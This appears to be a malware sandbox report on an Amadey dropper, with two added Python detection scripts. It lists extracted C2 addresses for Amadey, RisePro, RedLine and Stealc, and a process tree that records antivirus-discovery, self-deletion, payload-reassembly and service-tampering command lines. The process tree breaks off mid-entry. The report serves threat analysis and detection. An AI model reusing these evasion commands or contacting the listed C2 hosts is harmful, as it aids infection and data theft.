Analysis

  • max time kernel
    121s
  • max time network
    155s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags
    arch:x64
    arch:x86
    image:win11-20240508-en
    locale:en-us
    os:windows11-21h2-x64
    system
  • submitted
    11-05-2024 22:38

General

  • Target

    fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6.exe

  • Size

    1.8MB

  • MD5

    ce33f4b354a2a2ee3a9e34cb4d186683

  • SHA1

    9306604b015e48b82492462410867141c30cde63

  • SHA256

    fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6

  • SHA512

    7505e13c21da7d6b9bddb318941b9ef09913d94f5a3a6b3784be00763c6903a37e57d3401770421b1bb22c1ef07c90b88e91dd4635c130feb681224b2960bae0

  • SSDEEP

    49152:sRYBnI+9uLT+N/AvUvCq5ivfHUHXMAp+aAVDDZ:sInI+9SCZ4ICGi03Vp7AVDV

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d
rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php
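
The C2 values above only become usable indicators once they are joined with the matching url_path attribute: Amadey and Stealc check in to host + path, while RisePro and RedLine use raw ip:port sockets with no HTTP path. The Python below is an added example, not part of the sandbox report, showing how to expand the extracted configs into indicators and run them over log lines. The C2 values are copied from the Malware Config section; the proxy and connection log lines, the internal client 10.0.0.23 and the 203.0.113.5 entry are constructed for illustration.

```python
"""Expand the configs extracted in this report into network indicators and
match them against log lines.  Added example, not part of the sandbox output;
the proxy and connection log lines at the bottom are constructed for
illustration (the internal host 10.0.0.23 and the benign 203.0.113.5 entry are
made up); the C2 values are copied from the Malware Config section above."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class ExtractedConfig:
    family: str
    c2: list
    url_paths: list = field(default_factory=list)


# Values as listed under "Malware Config" in this report.
CONFIGS = [
    ExtractedConfig("amadey", ["http://5.42.96.141", "http://5.42.96.7"],
                    ["/go34ko8/index.php"]),
    ExtractedConfig("risepro", ["147.45.47.126:58709"]),
    ExtractedConfig("redline", ["185.172.128.33:8970", "185.215.113.67:26260"]),
    ExtractedConfig("stealc", ["http://49.13.229.86"], ["/c73eed764cc59dcb.php"]),
]


def c2_indicators(configs):
    """Expand configs into (kind, value, family) tuples.

    'url'  : scheme://host + url_path, i.e. the exact check-in endpoint
    'host' : bare host (from a URL) or ip:port (from a socket C2)
    A bare-host hit is weaker evidence than a full-URL hit, so the two are
    kept distinct rather than collapsed into one string set.
    """
    ind = []
    for cfg in configs:
        for c2 in cfg.c2:
            if "://" in c2:
                ind.append(("host", urlsplit(c2).netloc, cfg.family))
                for path in cfg.url_paths:
                    ind.append(("url", c2.rstrip("/") + path, cfg.family))
            else:
                ind.append(("host", c2, cfg.family))
    return ind


URL_RE = re.compile(r"https?://\S+")
CONN_RE = re.compile(r"->\s*(\d{1,3}(?:\.\d{1,3}){3}:\d+)")


def match_line(line, ind):
    """Return (confidence, family) for the strongest hit on one line, or None."""
    best = None
    m = URL_RE.search(line)
    if m:
        url = m.group(0)
        host = urlsplit(url).netloc
        for kind, value, fam in ind:
            if kind == "url" and url == value:
                return ("high", fam)       # exact C2 endpoint from the config
            if kind == "host" and host == value:
                best = ("medium", fam)     # same server, different path
    m = CONN_RE.search(line)
    if m:
        for kind, value, fam in ind:
            if kind == "host" and m.group(1) == value:
                return ("high", fam)       # socket C2 is host:port, no path
    return best


def scan(lines, configs=CONFIGS):
    """Run every line through the indicator set; returns (confidence, family, line)."""
    ind = c2_indicators(configs)
    hits = []
    for line in lines:
        result = match_line(line, ind)
        if result:
            hits.append((result[0], result[1], line))
    return hits


# Constructed sample logs (not from the sandbox run); timestamps are arbitrary.
SAMPLE_PROXY = [
    "2024-05-11T22:40:01Z 10.0.0.23 POST http://5.42.96.141/go34ko8/index.php 200",
    "2024-05-11T22:40:09Z 10.0.0.23 GET http://49.13.229.86/c73eed764cc59dcb.php 200",
    "2024-05-11T22:41:00Z 10.0.0.23 GET http://example.com/ 200",
]
SAMPLE_CONN = [
    "2024-05-11T22:40:30Z 10.0.0.23:51234 -> 185.172.128.33:8970 TCP",
    "2024-05-11T22:40:31Z 10.0.0.23:51240 -> 147.45.47.126:58709 TCP",
    "2024-05-11T22:40:35Z 10.0.0.23:51250 -> 203.0.113.5:443 TCP",
]

if __name__ == "__main__":
    for conf, fam, line in scan(SAMPLE_PROXY + SAMPLE_CONN):
        print(f"[{conf}] {fam:8s} {line}")
```

Keeping host-only matches at medium confidence matters in practice: Amadey operators rotate the PHP path far more often than the server, so a hit on 5.42.96.141 with an unknown path is still worth an alert, just not the same alert as the exact endpoint.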

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Vidar Stealer 2 IoCs
  • Detect ZGRat V1 5 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • XMRig Miner payload 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Runs PowerShell with the display window hidden.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 19 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 9 IoCs
  • Executes dropped EXE 52 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 57 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
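
Several of the signatures above map directly onto command lines recorded in the Processes section: tasklist piped into findstr with security-product names, cmd.exe reassembling a split payload with copy /b, choice /T followed by Del to remove a host binary, sc.exe stop/delete before a service is reinstalled, ping -n 5 127.0.0.1 as a sleep, and RegAsm.exe/CasPol.exe started by dropped executables or PowerShell (the SetThreadContext signature). The Python below is an added example, not part of the sandbox report, that runs behavioural rules over process-creation events constructed by hand from that tree: paths and PIDs are as listed there (the report reuses a few PIDs later in the run, so only one process per PID is included), ppid 0 means the parent is not in the set, the notepad.exe entry is a made-up benign control, and the PowerShell -EncodedCommand argument is left as <elided> because the report does not show it.

```python
"""Behavioural checks over a process tree, using the command lines this
report's Processes section records.  Added example, not part of the sandbox
output.  EVENTS is constructed by hand from that tree (PIDs/paths as listed,
a fictitious notepad.exe added as a benign control, ppid 0 = parent not in
the set, and the PowerShell -EncodedCommand argument left as <elided> because
the report does not show it)."""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

EVENTS = [
    Proc(2652, 4632, r"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"'),
    Proc(4996, 2652, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    Proc(4616, 4996, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"'),
    Proc(3768, 2788, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /k move Organizations Organizations.cmd & Organizations.cmd & exit'),
    Proc(2752, 3768, r"C:\Windows\SysWOW64\findstr.exe",
         r'findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"'),
    Proc(2876, 3768, r"C:\Windows\SysWOW64\cmd.exe",
         r"cmd /c copy /b Enforcement + Orientation + Coach 5593775\f"),
    Proc(4976, 3768, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 5 127.0.0.1"),
    Proc(3060, 2840, r"C:\Windows\SysWOW64\sc.exe", "Sc stop GameServerClient"),
    Proc(3100, 3028, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -EncodedCommand <elided>"),
    Proc(2012, 3100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"'),
    Proc(9001, 9000, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign control
]

# Security products the batch stage looked for (taken from the findstr lines in the report).
AV_PROCS = {"wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
            "nswscsvc.exe", "sophoshealth.exe"}
# Signed .NET utilities commonly used as hollowing targets (RegAsm and CasPol appear in this report).
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "caspol.exe", "installutil.exe", "msbuild.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (rule_name, pid) findings; one finding per matching rule per process."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        cl = e.cmdline.lower()
        parent = by_pid.get(e.ppid)
        # .NET host started from a user-writable path or by PowerShell: consistent
        # with the SetThreadContext hollowing seen under alex.exe / gold.exe.
        if name in DOTNET_HOSTS and parent and (
                "\\users\\" in parent.image.lower() or basename(parent.image) == "powershell.exe"):
            findings.append(("dotnet_host_from_user_path", e.pid))
        # choice /T n used as a sleep, then del: the dropper removing its own host binary.
        if name == "cmd.exe" and re.search(r"choice\s.*?/t\s+\d+.*?&\s*del\b", cl):
            findings.append(("delayed_self_delete", e.pid))
        # A non-script file renamed to .cmd/.bat and run in the same command.
        if name == "cmd.exe" and re.search(r"\bmove\s+\S+\s+\S+\.(cmd|bat)\b", cl):
            findings.append(("renamed_script_execution", e.pid))
        # findstr fed a list of AV process names (normally piped from tasklist).
        if name == "findstr.exe" and AV_PROCS & set(re.findall(r"[\w-]+\.exe", cl)):
            findings.append(("av_process_discovery", e.pid))
        # copy /b a + b + c: reassembling a payload that was dropped in pieces.
        if name == "cmd.exe" and re.search(r"copy\s+/b\s+\S+(\s*\+\s*\S+)+", cl):
            findings.append(("chunked_payload_reassembly", e.pid))
        if name == "sc.exe" and re.match(r"\S+\s+(stop|delete)\s+", cl):
            findings.append(("service_stop_or_delete", e.pid))
        if name == "powershell.exe" and re.search(r"\s-e(ncodedcommand|nc)?\s", cl):
            findings.append(("encoded_powershell", e.pid))
        # ping -n N 127.0.0.1 is the usual cmd.exe sleep substitute.
        if name == "ping.exe" and re.search(r"-n\s+\d+\s+127\.0\.0\.1", cl):
            findings.append(("ping_sleep", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in analyze(EVENTS):
        print(f"{rule:28s} pid={pid}")
```

The same rules apply unchanged to Sysmon Event ID 1 (ProcessCreate) records, which carry Image, CommandLine and ParentImage; the parent-image condition is what separates RegAsm.exe hollowed by a dropped executable from RegAsm.exe run legitimately by a build tool.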

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2952
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2852
    • C:\Users\Admin\AppData\Local\Temp\fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6.exe
      "C:\Users\Admin\AppData\Local\Temp\fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
          "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
          3⤵
            PID:3944
          • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3152
            • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
              "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4632
              • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2652
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:3488
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4996
                    • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2992
                    • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                      7⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4312
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                      7⤵
                        PID:4616
                        • C:\Windows\SysWOW64\choice.exe
                          choice /C Y /N /D Y /T 3
                          8⤵
                            PID:1504
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 380
                        6⤵
                        • Program crash
                        PID:3632
                    • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4816
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        6⤵
                          PID:1832
                      • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3032
                        • C:\Users\Admin\AppData\Local\Temp\enpl.exe
                          "C:\Users\Admin\AppData\Local\Temp\enpl.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2788
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k move Organizations Organizations.cmd & Organizations.cmd & exit
                            7⤵
                              PID:3768
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                8⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4112
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr /I "wrsa.exe opssvc.exe"
                                8⤵
                                  PID:2400
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist
                                  8⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:468
                                • C:\Windows\SysWOW64\findstr.exe
                                  findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                  8⤵
                                    PID:2752
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c md 5593775
                                    8⤵
                                      PID:2088
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /V "EntityKnowStagesJamie" Promotional
                                      8⤵
                                        PID:3196
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c copy /b Enforcement + Orientation + Coach 5593775\f
                                        8⤵
                                          PID:2876
                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5593775\Aviation.pif
                                          5593775\Aviation.pif 5593775\f
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:4464
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2244
                                            9⤵
                                            • Program crash
                                            PID:1104
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2324
                                            9⤵
                                            • Program crash
                                            PID:396
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping -n 5 127.0.0.1
                                          8⤵
                                          • Runs ping.exe
                                          PID:4976
                                  • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of WriteProcessMemory
                                    PID:4484
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                      6⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2840
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc stop GameServerClient
                                        7⤵
                                        • Launches sc.exe
                                        PID:3060
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameServerClient confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4716
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc delete GameSyncLink
                                        7⤵
                                        • Launches sc.exe
                                        PID:4804
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameSyncLink confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:792
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4492
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService start GameSyncLink
                                        7⤵
                                        • Executes dropped EXE
                                        PID:3004
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                      6⤵
                                        PID:3012
                                        • C:\Windows\SysWOW64\sc.exe
                                          Sc stop GameServerClientC
                                          7⤵
                                          • Launches sc.exe
                                          PID:3916
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService remove GameServerClientC confirm
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2192
                                        • C:\Windows\SysWOW64\sc.exe
                                          Sc delete PiercingNetLink
                                          7⤵
                                          • Launches sc.exe
                                          PID:5000
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService remove PiercingNetLink confirm
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1636
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2012
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService start PiercingNetLink
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1352
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                        6⤵
                                          PID:3292
                                          • C:\Windows\SysWOW64\sc.exe
                                            Sc delete GameSyncLinks
                                            7⤵
                                            • Launches sc.exe
                                            PID:2884
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService remove GameSyncLinks confirm
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2592
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2364
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService start GameSyncLinks
                                            7⤵
                                            • Executes dropped EXE
                                            PID:3060
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                          6⤵
                                            PID:4716
                                        • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3016
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            6⤵
                                              PID:4720
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              6⤵
                                              • Loads dropped DLL
                                              • Checks processor information in registry
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3588
                                          • C:\Users\Admin\AppData\Local\Temp\1000008001\udated.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000008001\udated.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:3180
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              6⤵
                                                PID:4952
                                            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4020
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                6⤵
                                                  PID:916
                                              • C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:792
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand 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"
                                                  6⤵
                                                    PID:3028
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe -EncodedCommand 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
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3100
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                        8⤵
                                                        • Drops startup file
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2012
                                                        • C:\Users\Admin\Pictures\dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                          "C:\Users\Admin\Pictures\dH6oPXkyyyDL7hNf3xeAvCZ9.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:3592
                                                          • C:\Users\Admin\AppData\Local\Temp\u2rs.0.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\u2rs.0.exe"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Checks processor information in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:468
                                                          • C:\Users\Admin\AppData\Local\Temp\u2rs.1.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\u2rs.1.exe"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:1692
                                                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                              11⤵
                                                                PID:5660
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 1404
                                                              10⤵
                                                              • Program crash
                                                              PID:4816
• C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe
  "C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe"
  9⤵
  • Executes dropped EXE
  PID:1356
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    10⤵
    • Command and Scripting Interpreter: PowerShell
    PID:4580
  • C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe
    "C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe"
    10⤵
    PID:5924
• C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe
  "C:\Users\Admin\Pictures\4qr8a7wdg8ZGAzWBvkAFxqAb.exe"
  9⤵
  • Executes dropped EXE
  PID:3464
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    10⤵
